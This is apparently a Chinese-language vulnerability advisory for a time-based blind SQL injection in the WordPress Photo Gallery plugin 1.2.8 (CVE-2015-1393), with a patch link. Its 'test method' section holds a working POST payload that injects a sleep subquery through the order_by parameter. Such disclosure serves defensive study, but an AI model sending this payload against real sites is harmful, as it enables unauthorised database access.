内容安全 
大数据安全 
网络安全 
更多产品 
WordPress Photo Gallery插件\'asc_or_desc\'参数SQL注入漏洞
发表日期:2015-02-03 10:07:42
WordPress Photo Gallery插件\'asc_or_desc\'参数SQL注入漏洞
BugTraq-ID:72364
CVE-ID:CVE-2015-1393
发布日期:2015-01-29
更新日期:2015-01-30
受影响系统:
WordPress Photo Gallery 1.2.8
详细信息:
Photo Gallery高级插件可根据需要创建网站的图库。
Photo Gallery 1.2.8及其他版本没有有效过滤用户请求,POST中的参数asc_or_desc存在基于时间的盲SQL注入,成功利用后可使攻击者直接访问数据库。
来源:
Sven Schleier
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!search_value=&page_number=1&search_or_not=&task=add&current_id=&ids_string=&asc_or_desc=asc&order_by=asc%2c(select%20*%20from%20(select(sleep(10)))a)
解决办法:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://downloads.wordpress.org/plugin/photo-gallery.1.2.8.zip
